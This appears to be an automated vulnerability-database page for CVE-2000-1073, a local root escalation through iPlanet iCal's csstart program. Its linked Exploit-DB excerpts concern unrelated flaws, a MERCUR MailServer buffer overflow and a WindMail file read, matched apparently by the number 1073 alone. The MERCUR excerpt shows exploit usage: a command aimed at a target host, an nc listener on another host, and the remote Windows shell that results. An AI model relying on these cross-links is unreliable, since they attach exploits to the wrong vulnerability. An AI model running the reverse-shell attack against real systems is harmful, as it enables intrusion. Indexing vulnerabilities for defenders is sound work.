CVE-2000-1073
published 2000-12-11CVE-2000-1073: csstart program in iCal 2.1 Patch 2 searches for the cshttpd program in the current working directory, which allows local users to gain root privileges by…
PriorityP419high7.2CVSS 2.0
AVLACLAuNCCICAC
EPSS
0.49%
38.4th percentile
csstart program in iCal 2.1 Patch 2 searches for the cshttpd program in the current working directory, which allows local users to gain root privileges by creating a Trojan Horse cshttpd program in a directory and calling csstart from that directory.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netscape | iplanet_ical | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
exploitdb·2002-07-16
CVE-2002-1073 3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
---
// source: https://www.securityfocus.com/bid/5261/info
// MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.
/*
mercrexp.c (7/16/2002)
# ./mercrexp 192.168.0.2 32000 192.168.1.2 3333
# nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\WINNT\system32>
2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@
Exploit-DB
GeoCel WindMail 3.0 - Remote File Read
exploitdb·2000-03-27
CVE-2000-0242 GeoCel WindMail 3.0 - Remote File Read
GeoCel WindMail 3.0 - Remote File Read
---
source: https://www.securityfocus.com/bid/1073/info
WindMail is a command-line mailer that can be integrated with perl cgi applications to create form-mail capability for a website.
WindMail 3.0 and possibly previous versions can be used to retrieve any ascii file that the webserver has read access to, provided the path and filename is known to the attacker. If the attacker has write access anywhere on the system and can determine the path to the writable directory, any file whether ascii or binary can be retrieved.
WindMail operates in two modes: "command line" and "header parsing".
In command line mode, all delivery options are specified at the command line as switch values, and the -n switch specifies a file name to send as the message bo
No writeups or analysis indexed.
http://www.atstake.com/research/advisories/2000/a100900-1.txthttp://www.osvdb.org/7210http://www.securityfocus.com/bid/1769https://exchange.xforce.ibmcloud.com/vulnerabilities/5757http://www.atstake.com/research/advisories/2000/a100900-1.txthttp://www.osvdb.org/7210http://www.securityfocus.com/bid/1769https://exchange.xforce.ibmcloud.com/vulnerabilities/5757
2000-12-11
Published